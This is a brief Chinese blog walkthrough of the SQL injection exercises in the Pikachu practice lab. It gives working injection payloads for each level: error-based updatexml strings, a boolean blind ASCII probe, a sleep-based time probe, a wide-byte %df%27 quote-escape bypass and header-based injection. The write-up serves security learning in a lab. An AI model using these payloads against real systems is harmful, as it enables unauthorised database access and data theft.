zoukankan      html  css  js  c++  java
  • pikachu-sql注入

    sql注入数字型post
    bp抓包后修改下提交的数据即可
    字符型注入
    输入
    ' 1 = 1#
    

    搜索型
    既然提示输入用户名的一部分猜想,使用的是sql中的like来进行匹配,这样使用%闭合即可

     

    xx型注入
    输入单引号返回提示

    所以闭合就是 '),接着遍历

     

    insert/update注入
    既然是插入语句,所以插入的内容一定是变量,所以我们直接闭合
    ma' or updatexml(1,concat(0x7e,database()),0) or '
    

     

    随便注册之后登录

    修改个人信息
    既然是修改一定是使用update语句,所以我们构造一下闭合就行,输入的语句同上面一样
    ma' or updatexml(1,concat(0x7e,database()),0) or '
    

     delete

    删除一个数据然后抓包看看
    语句
    id=68+or+updatexml(1,concat(0x7e,database()),0)
    

    Http header注入
    后台开发人员为了验证客户端头信息,比如常用的cookie验证,或者通过http请求头信息获取客户端的一些信息,比如useragent、accept字段等等,会对客户端的http请求头信息获取并使用sql进行处理,如果此时没有足够的安全考虑,则可能会导致基于http头的sql注入漏洞,进入之后抓包

    传个单引号

    发现有错误提示,那就继续使用上面的语句

    盲注
    输入了很多测试发现前面只有是用户名的时候才能返回信息

     输入or不行这里只能输入and

    所以盲找下数据库首字母的ascii
    kobe' and ascii(substr(database(),1,1))=112#
    
     
     
    盲注(base on time)
    kobe’ and sleep(5)#
    

     

    宽字节注入
    在后台单引号会被转义
    kobe%df%27 or 1=1#
    

  • 相关阅读:
    第五周学习进度条
    课堂实验4.1(环数组)
    每日站立会议(3)
    每日站立会议(2)
    找水王
    购买一批书的最低价格
    每日站立会议(1)
    NABCD分析
    团队开发博客
    返回一个二维整数数组中的最大子数组之和(环)
  • 原文地址:https://www.cnblogs.com/zhao-yang/p/12605136.html
Copyright © 2011-2022 走看看